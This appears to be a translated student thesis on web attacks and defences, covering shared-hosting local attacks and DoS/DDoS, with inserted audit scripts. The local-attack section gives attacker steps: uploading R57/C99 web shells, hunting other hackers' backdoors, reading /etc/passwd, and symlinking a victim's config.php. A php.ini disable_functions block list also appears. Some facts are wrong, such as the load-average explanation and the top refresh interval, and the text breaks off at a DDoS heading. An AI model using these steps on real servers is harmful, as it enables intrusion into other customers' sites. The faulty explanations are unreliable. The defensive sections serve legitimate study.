TABLE OF CONTENTS

CHAPTER 1
OVERVIEW OF WEBSITES, WEBSITE SERVICES AND COMMON SECURITY FLAWS
1.1. Description of a website and how it works
1.2. Web-based services and applications
CHAPTER 2
COMMON WEB APPLICATION ATTACKS AND DEFENCES
2.1. LOCAL ATTACK
2.1.1. Understanding Local Attack
2.1.2. How a Local Attack is carried out
2.1.3. Protecting against Local Attack
2.1.4. Supporting tools
2.2. Denial of service attacks (Denial Of Service)
2.2.1. DoS (Denial Of Service)
2.2.2. DDoS (Distributed Denial of Service)
2.2.3. Multi-zone reflection denial of service attack, DRDoS (Distributed Reflection Denial of Service)
2.3. SQL Injection
2.3.1. SQL injection attacks
2.3.2. Preventing SQL Injection
2.4. Cross Site Scripting (XSS)
2.4.1. XSS attacks
2.4.2. Prevention
2.5. Botnet
2.5.1. Understanding botnets and how they spread
2.5.2. Remediation
2.5.5. Supporting tools
2.6. Social Engineering
2.6.1. Common types of scams
Face mail
2.6.2. Other types of scams
2.7. Sniffer
2.7.1. Understanding sniffer attacks
2.7.2. Supporting tools
CHAPTER 3
DEMO
CONCLUSION
REFERENCES
SUPERVISOR'S COMMENTS
REVIEWING LECTURER'S COMMENTS
PREFACE
Along with the development of information technology, computer networking and the Internet have grown ever more diverse and rich. Network services have penetrated most areas of social life. Information on the Internet is likewise diverse in content and form, and much of it needs a higher level of protection because of its economic value, its accuracy and its reliability.
At the same time, the ways of sabotaging networks have become more sophisticated and complex. For every system, therefore, the security task placed on the network administrator is extremely important and necessary. Starting from these facts, we will study the most common attacks today and the defences against them.
For that reason, by studying a number of attack methods and how to secure systems against them, I hope to contribute a small part to the study and understanding of network security issues, in support of learning and research.
I sincerely thank Mr. Nguyn Gia Nh, who directly supervised my specialised project and helped me to complete it.
1. Reasons for choosing the topic
In recent years Vietnam has developed steadily, above all in information technology. This is especially true of web applications: almost everyone has heard of and worked with one. Websites have become common and an important part of everyone's life, especially for businesses and companies. At the same time, the security of web applications has always been a difficult problem for everyone. We will therefore study web applications and the ways of attacking and securing the web.
2. Objectives
To help us better understand website applications and the threats to information security that arise when we work with web applications every day, and to understand web attack and defence techniques more clearly.
3. Scope
To study the most common attack techniques today, such as SQL Injection, Denial Of Service and Local Attack, and to give a general overview of how to secure systems and defend against these common attacks.

CHAPTER 1
OVERVIEW OF WEBSITES, WEBSITE SERVICES AND COMMON SECURITY FLAWS
1.1. Description of a website and how it works
A website is a "web site" on the Internet: the place that presents information and images about a business and its products and services (or any other information) so that customers can access it from anywhere, at any time.
A website is a collection of pages [web pages]. When a business builds a website, it is building many information pages, product catalogues, services and so on. Creating a website requires 3 basic elements:
- A domain name (domain).
- A place to store the website (hosting).
- The content of the information pages [web pages].
Some basic terms:
- A dynamic website is a website that has a database and is provided with a website management tool (Admin Tool). Dynamic websites are flexible: their information can be updated frequently and their components are easy to manage. This kind of website is usually written in programming languages such as PHP, Asp.net, JSP, Perl,..., with the database administered through SQL or MySQL,...
- A static website is programmed in HTML page by page, like a brochure, with no database and no tool for managing the information on the site. Static websites are usually designed with software such as FrontPage, Dreamweaver,... A static website rarely changes its content, and such changes usually involve changing the accompanying text that presents the content.
Today most businesses use dynamic websites, and the generation of website technology everyone knows is web 2.0.
Domain name (domain): The domain name is the address of the website. On the Internet an address exists only once (that is, a domain name is unique). There are 2 kinds of domain name:
- International domain names: names of the form .com; .net; .org; .biz; .name ... For example: www.tendep.com, www.kenhtretho.com
- Vietnamese domain names: names of the form .vn; .com.vn; .net.vn; org.vn; .gov.vn;... For example: www.tamnguyen.vn, www.tamnguyen.com.vn, www.dantri.com.vn
Website hosting: The website's data must be stored on a computer (a server) that is always running and connected to the Internet. One server can host many websites; if that server has a fault, for example it is switched off for a period, nobody can access the websites hosted on it during that time. Depending on how much information it needs to store, a business can rent a suitable amount of space for its website [renting host capacity].
Host capacity: the place where the website's data (images, information ...) is stored; the unit of capacity is usually Mb or Gb.
Bandwidth, or transfer capacity: the total number of Mb of data uploaded to or downloaded from the server (download, upload) where the website is hosted; the usual unit is Mb/month.
1.2. Web-based services and applications
With today's technology a website is no longer just a news page offering simple articles. Applications written for the web are no longer called merely a part of a website; they are now called web-based software.
A great deal of software runs on the web, such as Google word (word processing), Google spreadsheets (spreadsheets), Email, ...
Some advantages of web-based software or applications:
- Everyone has a browser, and a browser is all you need to run the software.
- The software is always up to date because it runs on the server.
- It is always available, 24/7.
- Data is easy to back up regularly.
- It can be accessed at any time, from anywhere, as long as you have a network connection.
- Deployment costs are extremely low compared with desktop software.
Imagine you have a sales management or task management application at your company. You are not always at the office; with web-based software you can check and direct things from anywhere, and you need only a phone that can run a browser, such as an IPhone, rather than a computer.

CHAPTER 2
COMMON WEB APPLICATION ATTACKS AND DEFENCES
2.1. LOCAL ATTACK
2.1.1. Understanding Local Attack
Local attack is one of the very common kinds of hack, and one that is not recommended. On an ordinary web server, when you register an account on a server you are given an account on that server and a directory in which to manage your site, for example: tenserver/tentaikhoancuaban. Another user likewise has a similar account, such as: tenserver/taikhoan1. Suppose taikhoan1 is taken over by a hacker; the hacker can then use tricks, scripts and command code to reach the directory that holds your site, tenserver/taikhoancuaban. In the same way the hacker can attack other users' sites and can obtain admin information, the database and other confidential information, or insert malicious code into the index page of your site. This form of attack is called Local Attack.
Most commonly, Local Attack is used to read the config information of the victim; the hacker then sabotages the website based on the information in the config and on his purpose.
2.1.2. How a Local Attack is carried out
The way a Local Attack is carried out varies with the hacker's methods. Usually hackers use command code to attack the database.

2.1.2.1. Preparation
- First there must be a PHP/ASP/CGI backdoor on the server. There are many kinds of backdoor, but the most common are phpRemoteView (usually called remview), R57Shell, CGITelnet, C99, ... The tools above are uploaded, usually shells such as R57, C99, ...
- Upload one of those tools to a host (usually the R57, C99,.. shells are used because they are powerful and easy to use).
There are several ways to get a host:
+ Buy a host (hackers rarely do this for many reasons, the basic one being that it costs money and, if the server admin discovers the uploaded shell, the host will be deleted,..). With this approach the shells should be deleted immediately after the Local is finished.
+ Hack a vulnerable site and upload a shell (hackers usually use SQL Injection to hack a website, take over its admin account and upload the shells), or exploit an inclusion flaw.
+ Search for a backdoor (go to google.com and search for the keywords: <?phpRemoteView?> , r57Shell ...). With this approach most of the shells found are ones other hackers have used and not yet deleted; if possible we should upload a different shell of our own.
2.1.2.2. Carrying out the attack
Once the preparation is done, that is, once the shell has been uploaded to some server, we start looking for the websites on the same server as the uploaded shell. Hackers usually run a Reverse IP lookup on the domain where the shell was uploaded to see the websites on the same server.
After obtaining the list of websites, check each in turn to see which site is vulnerable and can be reached locally.
Commands commonly used in the shell for a Local Attack:
View the domain names on the same host:
ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia
In the special case where the users on the same host cannot be viewed, add &&:
cd /etc/vdomainaliases && ls -lia
+ To find the user names, use the command:
cat /etc/passwd
Or
less /etc/passwd
+ Local to the victim, that is, local to another site.
For example, if our shell is currently in:
/home/abcd/public_html/
we local across as follows:
dir /home/<name of the target user>/public_html
To find the name of the user to local to, we use Reverse IP to get the list of users on the same server. To find out whether that user exists, we open a web browser and type: server IP/~user name (for example: 203.166.222.121/~doanchuyennganh). If the browser shows the index page of the website, the user exists.
+ View the contents of a file:
cat /home/<name of the target user>/public_html/index.php
Or, to view the config of a forum, use:
ln -s /home/<name of the target user>/public_html/forum/includes/config.php doanchuyennganh.txt
Here doanchuyennganh.txt is the file we create on our own host in order to view the other person's file. If the commands above cannot be used, the server has disabled that function.
Some more shell commands in Linux:
- pwd: prints the current working directory (for example: /etc/ssh).
- cd: changes directory (for example: cd .. goes up one level from the current directory; cd vidu enters the directory /vidu).
- ls: lists the contents of a directory.
- mkdir: creates a new directory (mkdir directory_name).
- touch: creates a new file (touch file_name).
- rmdir: removes a directory (rmdir directory_name).
- cp: copies a file or directory (cp source_file destination_file).
- mv: moves a file or directory; also used to rename a file or directory (mv old_location new_location or mv old_name new_name).
- rm: removes a file (rm file_name).
To search for files, you can use:
- find : for file names.
- grep <>: searches the contents of files.
To view a file, you can use:
- more : displays the file page by page.
- cat <>: displays the whole file.
To connect to a remote host, use the ssh command. The syntax is ssh <host_name>.
System management:
- ps: shows the programs currently running (very useful: ps gives an overall view of all programs).
In the list produced by the ps command you will see the PID number (Process identification).
This number is asked for when you want to stop a service or application with the kill command.
- top: works much like Task Manager in Windows. It gives information on all system resources, the running processes, the load average ... The command top -d <delay> sets the refresh interval. You can set any value, from .1 (that is, 10 milliseconds) to 100 (that is, 100 seconds) or even higher.
- uptime: shows the system time and the load average over that period, previously 5 minutes and 15 minutes.
Normally the load average is calculated as the percentage of system resources (processor, RAM, disk input/output, network load) in use at a given moment. If the calculated figure is 0.37, then 37% of resources are in use. A larger value such as 2.35 means the system has to wait for some data, at which point it would compute 235% faster without any problem. This may differ slightly between distributions.
- free: shows information about system memory.
- ifconfig <interface_name>: shows detailed information about network interfaces; an ethernet interface is usually named eth(). You can set network settings such as the IP address with this command (see man ifconfig). If something is not right, you can stop or start the interface with the command ifconfig <interface_name> up/down.
- passwd: lets you change a password (passwd for the user who owns the password, or another user name if you are logged in as root).
- useradd: lets you add a new user (see man useradd).
In any distribution you can use the TAB key to complete a command or file name automatically. This is very useful once you are familiar with the commands. You can also use the up and down arrow keys to scroll through the commands already entered. You can put several commands on one line. For example, to create three directories on a single line, the syntax can be: mkdir directory_1 ; mkdir directory_2 ; mkdir directory_3.
Another interesting feature is piped commands. You can send the output of one command through another. For example: man mkdir | tail shows the last lines of the manual page of the mkdir command.
If at some point you are required to log in with the root account (that is, the system's "super" admin), you can log in temporarily with the su command. The -l parameter (su -l) is used to change the home directory and for commands already in use or being used. Note that you will also be prompted for a password.
To exit or close: type exit or logout.
2.1.3. Protecting against Local Attack
To limit Local Attack we should chmod through the file manager, move the config.php file, edit the htaccess file and, above all, back up data regularly.
- Chmod in File Manager:
+ CHMOD the Public_html directory to 710 instead of the default 750; this helps protect the structure of your website.
+ Then CHMOD the subdirectories: CHMOD the diendan directory (http://diendan.doanchuyennganh.com) to 701, then CHMOD the subdirectories inside the diendan directory (http://diendan.doanchuyennganh.com) to 701.
+ CHMOD all files to 404.
With this CHMOD, running the shell will certainly produce the error message:
Not Acceptable
An appropriate representation of the requested resource /test.php could not be found on
this server.
Additionally, a 404 Not Found error was encountered while trying to use an
ErrorDocument to handle the request.
The attacker will not be able to view it.
In addition, some sites are accessed through their subdomain rather than in the form doanchuyenganh.com/diendan (http://diendan.doanchuyennganh.com); this matters in several ways, and for security it makes a big difference.
+ CHMOD directories to 701 and try never to CHMOD 777. For a few unimportant folders you can CHMOD 755 so that some of the content in the folder is displayed correctly and completely.
Note that some servers support CHMOD 101 on directories. If your server supports it, use it, because this CHMOD is very safe: even the Owner cannot view the folder structure, even over FTP. At present only the Eshockhost.net server supports this.
+ CHMOD files to 604 and never leave them at 666. If 666 is needed for some task, CHMOD temporarily for that use and CHMOD back immediately afterwards. On servers that support CHMOD 404 on files, use that, for example the Eshockhost.net server.
- Change the default structure and the default names of files that contain important information. If you are able to, change the database structure as well.
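The permission rules above can be checked mechanically. The following is an added example, not part of the original document: it audits a document root for world-writable directories and files (the 777 and 666 cases), directories that other users can list, and symlinks that resolve outside the document root (the `ln -s .../config.php` trick described in 2.1.2.2), and it can apply the 701/604 modes the text recommends. The function names and finding labels are hypothetical, and GNU `find` and `readlink -f` are assumed.

```sh
#!/bin/sh
# Added example: audit a shared-hosting docroot against the modes discussed above.
# Assumes GNU find (-printf) and readlink -f. Function names are illustrative.

# audit_docroot DIR -> one "FINDING ..." line per problem, nothing if clean
audit_docroot() {
    ad_root=$(readlink -f "$1") || return 2
    # Directories any local user may write to (the 777 case).
    find "$ad_root" -type d -perm -0002 \
        -printf 'DIR_WORLD_WRITABLE %m %p\n'
    # Directories "other" may list (755 rather than 701): structure is exposed.
    find "$ad_root" -type d -perm -0004 ! -perm -0002 \
        -printf 'DIR_WORLD_LISTABLE %m %p\n'
    # Files any local user may modify (the 666 case).
    find "$ad_root" -type f -perm -0002 \
        -printf 'FILE_WORLD_WRITABLE %m %p\n'
    # Symlinks that resolve outside the docroot, e.g. a .txt link pointing at
    # another account's config.php so the web server will serve it as text.
    find "$ad_root" -type l | while IFS= read -r ad_link; do
        ad_target=$(readlink -f "$ad_link" 2>/dev/null) || ad_target=
        case "$ad_target" in
            "$ad_root"|"$ad_root"/*) ;;    # stays inside the docroot
            *) printf 'SYMLINK_ESCAPES %s -> %s\n' "$ad_link" "${ad_target:-?}" ;;
        esac
    done
}

# harden_docroot DIR: apply the modes the text recommends (dirs 701, files 604).
# Symlinks are left alone; review SYMLINK_ESCAPES findings by hand.
harden_docroot() {
    find "$1" -type d -exec chmod 701 {} +
    find "$1" -type f -exec chmod 604 {} +
}

# Usage: sh audit_docroot.sh /home/<account>/public_html
if [ "$#" -gt 0 ]; then audit_docroot "$1"; fi
```

Run the audit before and after `harden_docroot`; only symlink findings should remain, and each of those needs a manual decision.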
- Preventing local attacks by enabling safe-mode (for root):
As we know, for PHP webshells the PHP Configuration has options that restrict what they can do (in particular r57, with its automatic bypass), so the first job of the root accounts is to update to the latest PHP version and reconfigure php.ini:
PHP safe mode is a method for solving the security problem on servers that share hosting among many accounts (shared-server). It is architecturally incorrect to solve this at the PHP level. At present many people, especially ISPs, have chosen to enable safe-mode for security.
The configuration directives for Security and Safe Mode:
Code:
safe_mode: default: "0"; changeable: PHP_INI_SYSTEM
safe_mode_gid: default: "0"; changeable: PHP_INI_SYSTEM
safe_mode_include_dir: default: NULL; changeable: PHP_INI_SYSTEM
safe_mode_exec_dir: default: ""; changeable: PHP_INI_SYSTEM
safe_mode_allowed_env_vars: default: "PHP_"; changeable: PHP_INI_SYSTEM
safe_mode_protected_env_vars: default: "LD_LIBRARY_PATH"; changeable: PHP_INI_SYSTEM
open_basedir: default: NULL; changeable: PHP_INI_SYSTEM
disable_functions: default: ""; changeable: php.ini
disable_classes: default: ""; changeable: php.ini
The following is how to adjust the server configuration to turn safe mode on.
In the php.ini file:
safe_mode = Off is changed to safe_mode = On
disable_functions should contain the following functions:
PHP Code:
readfile, system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close,
proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit,
escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source, ini_alter,
virtual, openlog
As an example, take:
PHP Code:
-rw-rw-r-- 1 doanchuyennganh doanchuyennganh 33 Jul 1 19:20 script.php
-rw-r--r-- 1 root root 1116 May 26 18:01 /etc/passwd
where script.php is:
PHP Code:
<?php
readfile('/etc/passwd');
?>
Result:
PHP Code:
Warning: readfile() has been disabled for security reasons in
/docroot/script.php on line 2
Some advantages of enabling safe mode:
Usually when a file is uploaded, it goes into /tmp/ with permissions belonging to someone other than the owner.
Enabling safe-mode has drawbacks for people writing PHP code, so they usually have:
PHP Code:
<?php
// Check safe mode
if( ini_get('safe_mode') ){
// Code for when safe_mode is on
}else{
// Code for when safe_mode is off
}
?>
- Securing the Apache server:
First, an explanation of why Apache matters:
Client (Hacker using local attack) ------> Shared server
Shared Server --------------------------> Apache
Apache ---------------------------------> PHP/Perl ... processing ...
PHP/Perl (returns the result) ----------> Apache
Apache (returns the result) ------------> Client
Because of how Apache's own permissions are set .. it depends heavily on applications such as PHP/CGI ...
Installing Apache:
Code:
pw groupadd apache
pw useradd apache -c "Apache Server" -d /dev/null -g apache -s /sbin/nologin
By default, Apache's processes run with the privileges of the user nobody (except the main process, which must run with root privileges) and with the GID of the group nogroup. This can lead to serious security threats. After a successful break-in, an intruder can gain access to other processes running under the same UID/GID. The best solution is therefore to run Apache under a UID/GID from a separate group dedicated to that software alone.
Anyone used to *nix will be familiar with the idea of UID/GID as part of "file permission". This detail is expanded a little for readers who are not yet familiar with UID/GID. Two details of the creation of the separate group and user for Apache above deserve attention:
-d /dev/null: does not give the Apache user a $HOME directory as ordinary users have.
-s /sbin/nologin: does not let the Apache user use any shell at all. In some cases -s /bin/true is used instead of nologin; true is a command that does nothing and is completely harmless.
The reason for not giving the Apache user a $HOME directory or any "shell" is that, if this Apache account is compromised, the intruder has no opportunity to reach the system at the level needed for "privilege escalation" tricks. On *nix in general the "shell" is the interface between the user and the system; without a shell there is no means of access. If the setup above gave the Apache user a $HOME and allowed it to use a shell, it would have no value from a "security" point of view.
Go to http://httpd.apache.org/ to install the latest version (currently 2.2).
The permissions of a PHP shell should then be set separately, so that it has no right to jump across to other users.
Chmod in /usr/bin as follows:
-rwxr--r-x root nobody wget
and
-rwxr-x--- root compiler gcc
Block compilation with gcc, so that users cannot compile ready-made exploits to get root.
In /bin/:
-rwxr-xr-x root root cp
Likewise for rm, mv, tar, chmod, chown, chgrp...
-rwsr-x--- root wheel su
-rwxr-x--- root root ln
- Other ways to prevent Local Attack
+ Back up data regularly (reduces the damage if the database is dropped).
+ Remove the DROP database privilege from the user.
+ Turn safe mode on and disable some dangerous functions by creating a php.ini file with the following content:
Code:
safe_mode = On
display_errors = Off
disable_functions = passthru, system, shell_exec, exec, dir, readfile, virtual, socket_accept, socket_bind, socket_clear_error, socket_close, socket_connect, socket_create_listen, proc_terminate
log_errors = On
Then upload it to the public_html directory and chmod it to 444.
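A php.ini like the one above is only effective if every key is spelled correctly and the function list is complete. The following is an added example, not part of the original document: it audits a php.ini for misspelled or stray lines, for command-execution functions missing from disable_functions, and for display_errors, log_errors and open_basedir. Because safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4, the check reports reliance on it instead of requiring it. The helper names, finding labels and both sample files are constructed for illustration.

```sh
#!/bin/sh
# Added example: audit a php.ini for the hardening settings discussed above.
# Helper names, finding labels and the sample files are constructed.

# Command-execution functions taken from the disable_functions list in the text.
REQUIRED_DISABLED="system exec shell_exec passthru popen proc_open pcntl_exec dl"

# ini_get FILE KEY -> last uncommented value of KEY, trimmed of blanks and quotes
ini_get() {
    awk -v key="$2" '
        /^[ \t]*[;#]/ || !/=/ { next }
        {
            k = $0; sub(/=.*/, "", k); gsub(/[ \t]/, "", k)
            if (k != key) next
            v = substr($0, index($0, "=") + 1)
            sub(/[ \t]*;.*$/, "", v)                 # drop a trailing comment
            gsub(/^[ \t"]+|[ \t"]+$/, "", v)
            val = v
        }
        END { print val }' "$1"
}

# ini_bool FILE KEY -> on | off | unset
ini_bool() {
    case $(ini_get "$1" "$2" | tr 'A-Z' 'a-z') in
        on|1|true|yes) echo on ;;
        '') echo unset ;;
        *) echo off ;;
    esac
}

# audit_php_ini FILE -> one finding per line, nothing when the file passes
audit_php_ini() {
    # 1. Lines that never take effect: PHP does not reject a misspelled key,
    #    and a value left on a line of its own is not part of any directive.
    awk '
        BEGIN { n = split("safe_mode disable_functions disable_classes open_basedir display_errors log_errors", a, " ")
                for (i = 1; i <= n; i++) known[a[i]] = 1 }
        /^[ \t]*$/ || /^[ \t]*[;#]/ || /^[ \t]*\[/ { next }
        !/=/ { print "STRAY_LINE " $0; next }
        {
            k = $0; sub(/=.*/, "", k); gsub(/[ \t]/, "", k)
            fixed = k; gsub(/-/, "_", fixed); sub(/^disabled_/, "disable_", fixed)
            if (fixed != k && (fixed in known)) print "MISSPELLED_KEY " k " -> " fixed
        }' "$1"
    # 2. Functions a web shell needs in order to run commands.
    ap_disabled=$(ini_get "$1" disable_functions | tr -d ' \t' | tr ',' '\n')
    for ap_fn in $REQUIRED_DISABLED; do
        printf '%s\n' "$ap_disabled" | grep -qx "$ap_fn" || echo "NOT_DISABLED $ap_fn"
    done
    # 3. Error disclosure, logging and filesystem confinement.
    if [ "$(ini_bool "$1" display_errors)" != off ]; then echo "DISPLAY_ERRORS_NOT_OFF"; fi
    if [ "$(ini_bool "$1" log_errors)" != on ]; then echo "LOG_ERRORS_NOT_ON"; fi
    if [ -z "$(ini_get "$1" open_basedir)" ]; then echo "OPEN_BASEDIR_UNSET"; fi
    # 4. safe_mode was removed in PHP 5.4; it protects nothing on later versions.
    if [ "$(ini_bool "$1" safe_mode)" = on ]; then echo "SAFE_MODE_OBSOLETE"; fi
    return 0
}

# Constructed sample with a misspelled key and a list broken across lines.
sample_weak_ini() {
    cat <<'EOF'
safe-mode = on
display_errors = On
disable_functions = passthru, system, shell_exec, exec, readfile
proc_terminate
log_errors = On
EOF
}

# Constructed corrected counterpart (the open_basedir path is a placeholder).
sample_hardened_ini() {
    cat <<'EOF'
display_errors = Off
log_errors = On
open_basedir = "/home/example/public_html:/tmp"
disable_functions = passthru, system, shell_exec, exec, readfile, popen, proc_open, pcntl_exec, dl, proc_terminate
EOF
}

# Usage: sh audit_php_ini.sh /path/to/php.ini
if [ "$#" -gt 0 ]; then audit_php_ini "$1"; fi
```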
+ Rename the admincp directory and password-protect it:
Rename admincp, but do not put the new name, for example !!!!aaaad@, into the config.php file. Instead, do the following: create another directory named "admincp", copy all the files from the "!!!!aaaad@" directory into it, then open each file in turn and scramble it (so that the file cannot run), leaving only index.php unedited. Then go into cpanel and set a password on both the "!!!!aaaad@" directory and the "admincp" directory.
A brief explanation of what this achieves: imagine a hacker who knows the admin password and wants to get into admincp. He will certainly go to http://doanchuyennganh.com/forum/admincp and will then have to find a way past the password protection; even if he gets past it and logs in, he can do nothing (because all the files in the "admincp" directory have been scrambled).
+ Move the config.php file:
This is very important, because even if a hacker manages to upload a shell, he still needs the user and password to connect to the database. Do the following:
Step 1: Zend-encode the config.php file, rename it to something else, for example a.php, and move it to a directory outside the public_html directory. For example:
Step 2: Create another file named config.php with the following content. Example:
Code:
Remember to replace /home/lyamsinf/php/config.php with the path to your a.php file. Then Zend-encode this file as well.
Step 3: Next, move the "config.php" file (the one in the includes directory) to another location (outside the public_html directory, of course).
Open the "class_core.php" file in the "includes" directory and correct the path to the "config.php" file. Do the same for the "diagnostic.php" file in the "!!!!aaaad@" directory (the admincp directory you renamed). Then Zend-encode the two files "diagnostic.php" and "class_core.php".
After that, remember to go into the includes directory and create a "fake" config.php file, fill in made-up database user and password details, and Zend-encode it too.
In this way the real config.php file is hidden quite carefully, and a hacker will have a frustrating time trying to open it. For the time being, then, the database login details are safe from being lost.
2.1.4. Supporting tools
- The most common and most frequently used tools for Local Attack are shells. The shells usually used are R57, C99,..

Figure 2.1. Screenshot of one kind of shell

2.2. Denial of service attacks (Denial Of Service)
2.2.1. DoS (Denial Of Service)

2.2.1.1. General introduction to DoS:
DoS (Denial of Service) can be described as the act of preventing the legitimate users of a service from accessing and using it. It includes flooding the network and breaking connections to the service, with the ultimate aim of making the server unable to respond to service requests from clients. DoS can bring down a single computer, an internal network, or even a very large network system. In essence, in a DoS the attacker occupies a large amount of network resources such as bandwidth and memory, removing the ability to handle service requests from other clients.
2.2.1.2. Attack methods:
+ Sabotage based on the limited or non-recoverable nature of network resources.
- Through connections:
SYN flood attack:
Exploiting the way TCP/IP connections work, the hacker starts setting up a TCP/IP connection with the target but breaks off immediately after the SYN and SYN ACK steps complete, leaving the target in a waiting state (waiting for the ACK packet from the side that requested the connection) and repeatedly sending SYN ACK packets to establish the connection. Another way is to forge the source IP address of the SYN connection request; as in the previous case, the destination computer falls into a waiting state because the SYN ACK packets can never arrive, the source IP address being non-existent. Hackers can use this method to attack a network system with more bandwidth than their own.
- Using the victim's own resources to attack:
Land Attack: similar to SYN flood, but the hacker uses the target's own IP address as the source IP address in the packet, pushing the target into an endless loop as it tries to establish a connection with itself.
UDP flood attack: the hacker sends a UDP echo packet whose source IP address is the loopback port of the target itself, or of a computer on the same network as the target, through the UDP echo port (port 7), setting up an exchange of echo packets between the 2 computers (or between the target and itself if the target has a loopback port configured). The 2 computers gradually use up all their bandwidth and obstruct the sharing of network resources by the other computers on the network.
- Using bandwidth:
DDoS attack (Distributed Denial of Service): this is a very dangerous method. The hacker breaks into computer systems, installs remote control programs and activates them all at the same moment to attack one target together. This method can mobilise hundreds or even thousands of computers to take part in the attack at once (depending on the hacker's prior preparation) and can swallow the target's entire bandwidth in the blink of an eye.
- Using other resources:
The attacker exploits resources the victim needs in order to attack. Attackers can alter data and replicate the data the victim needs many times over, overloading the CPU and stalling data processing.
- Smurf Attack: this attack needs one very important system, the amplifying network. The hacker uses the address of the computer to be attacked to broadcast ICMP echo packets to an entire network. The computers on that network all send ICMP reply packets to the computer the hacker wants to attack. As a result that computer cannot process such a large volume of information in time and very easily hangs.
- Tear Drop attack: in a packet-switched network, data is divided into many packets, each with its own offset value, which may travel to the destination by different routes. At the destination the data is reassembled as it originally was using the offset value of each packet. Exploiting this, a hacker can create many packets with overlapping offset values and send them to the target. As a result the destination computer cannot put these packets in order and may hang because it has used up the system's processing capacity.
+ Sabotaging or altering configuration information.
Exploiting insecure configuration (for example, failing to authenticate the information in the update messages routers send and receive), the attacker changes important information remotely or directly so that legitimate users cannot use the service. For example: a hacker can break into DNS to change information, so that the DNS translation of a domain name into an IP is wrong. As a result, client requests for one domain turn into requests for another domain.
+ Sabotaging or altering physical hardware.
Exploiting the attacker's own privileges over the devices in the network system to gain access and sabotage them (routers, switches, ...).
2.2.1.3. Prevention measures
DoS can cost a great deal of time as well as money, so preventive measures are needed:
- The system model must be built sensibly, avoiding excessive interdependence, which easily leads to a fault in one part disrupting the whole system.
- Set passwords to protect important devices and resources.
- Set up levels of authentication for users as well as for sources of information on the network (routing updates exchanged between routers should also be authenticated).
- Build a filtering system on routers, firewalls and so on, and a system that protects against SYN flood.
- Accept only the services that are needed; temporarily stop services that are not yet required or not in use.
- Build a quota system that limits users, to prevent malicious users from using the resources on a server to attack the server itself or other networks and servers.
- Continually update, research and test to find security holes and remedy them promptly.
- Use measures that check the operation of the system continuously so that abnormal behaviour is detected immediately.
- Build a backup system.
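The SYN flood protection and continuous monitoring items above can be checked on a Linux server. The following is an added example, not part of the original document: it counts half-open (SYN_RECV) connections per listening port in `netstat -ant` style output, and checks a sysctl.conf for SYN cookies, for ignoring broadcast ICMP echo (the Smurf case) and for reverse-path filtering against spoofed source addresses. The function names, the alert threshold and all sample data are constructed; Linux and its standard sysctl key names are assumed.

```sh
#!/bin/sh
# Added example: detect a SYN backlog and check kernel settings on Linux.
# Function names, thresholds and sample data are constructed for illustration.

# half_open_report LIMIT < netstat-ant-output
# Prints one line per local port with at least LIMIT connections in SYN_RECV.
# Many half-open connections from many distinct sources is the spoofed
# SYN flood pattern described in the text.
half_open_report() {
    awk -v limit="$1" '
        $1 ~ /^tcp/ && $6 == "SYN_RECV" {
            port = $4; sub(/.*:/, "", port)        # local port
            src = $5;  sub(/:[0-9]+$/, "", src)    # remote address without port
            n[port]++
            if (!((port, src) in seen)) { seen[port, src] = 1; srcs[port]++ }
        }
        END {
            for (p in n) if (n[p] >= limit)
                printf "SYN_BACKLOG port=%s half_open=%d sources=%d\n", p, n[p], srcs[p]
        }' | sort
}

# sysctl_conf_get FILE KEY -> last uncommented value of KEY in a sysctl.conf
sysctl_conf_get() {
    awk -v key="$2" '
        /^[ \t]*[#;]/ || !/=/ { next }
        {
            k = $0; sub(/=.*/, "", k); gsub(/[ \t]/, "", k)
            if (k == key) { v = $0; sub(/^[^=]*=/, "", v); gsub(/[ \t]/, "", v); val = v }
        }
        END { print val }' "$1"
}

# check_sysctl_conf FILE -> one line per setting that is missing or wrong
check_sysctl_conf() {
    # tcp_syncookies: keep answering when the SYN queue is full
    # icmp_echo_ignore_broadcasts: do not act as a Smurf amplifier
    # rp_filter: reverse-path filtering against spoofed source addresses
    for cs_pair in net.ipv4.tcp_syncookies=1 \
                   net.ipv4.icmp_echo_ignore_broadcasts=1 \
                   net.ipv4.conf.all.rp_filter=1; do
        cs_key=${cs_pair%=*}
        cs_want=${cs_pair#*=}
        cs_have=$(sysctl_conf_get "$1" "$cs_key")
        [ "$cs_have" = "$cs_want" ] ||
            echo "SYSCTL $cs_key want=$cs_want have=${cs_have:-unset}"
    done
    return 0
}

# Constructed netstat output: 30 half-open connections to port 80 from
# distinct documentation addresses, plus ordinary traffic.
sample_netstat() {
    echo "Proto Recv-Q Send-Q Local Address           Foreign Address         State"
    i=1
    while [ "$i" -le 30 ]; do
        echo "tcp        0      0 192.0.2.10:80           198.51.100.$i:4${i}00      SYN_RECV"
        i=$((i + 1))
    done
    echo "tcp        0      0 192.0.2.10:80           203.0.113.5:40022       ESTABLISHED"
    echo "tcp        0      0 192.0.2.10:22           203.0.113.9:50111       SYN_RECV"
    echo "tcp        0      0 192.0.2.10:22           203.0.113.9:50112       SYN_RECV"
}

# Usage: netstat -ant | sh syn_check.sh 100
if [ "$#" -gt 0 ]; then half_open_report "$1"; fi
```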
2.2.2. DDoS (Distributed Denial of Service)
Distributed Denial Of Service (DDoS) is an attack technique that worries ISPs; mainstream hackers do not recognise DDoS as a legitimate attack technique. Nevertheless Black hats have many advantages when mounting attacks with DDoS. Preventing and stopping DDoS is still carried out only at the level of dealing with the consequences and tracking down the culprit.
2.2.2.1. The stages of a DDoS attack:
There are 3 stages:
i. Preparation stage:
- Prepare the key tool of the attack, which usually works on a client-server model. The hacker can write this software or download it easily; according to provisional figures there are more than 10 DDoS tools available free on the Internet (these tools are analysed in detail in a later section).
- Next, other hacking techniques are used to take full control of a number of hosts on the network. The necessary software is installed on these hosts, and the configuration and testing of the whole attack-network (comprising the network of exploited machines together with the software set up on them, the hacker's machine, and any other machines set up as points for launching the attack) is also carried out at this stage.
ii. Stage of determining the target and the timing:
- After determining the target for the last time, the hacker adjusts the attack-network to direct the attack towards the target.
- The timing determines the degree of damage and the speed of the target's response to the attack.
iii. Launching the attack and erasing traces:
- At the chosen moment the hacker launches the attack from his own machine; the attack command may pass through several levels before it reaches the hosts that actually attack. The whole attack-network (which may number thousands of machines) continuously drains the capacity of the target server, preventing it from operating as designed.
- After a suitable period of attack, the hacker erases every trace that could lead back to him; this requires a fairly high level of skill and is not absolutely necessary.
2.2.2.2. General architecture of a DDoS attack-network
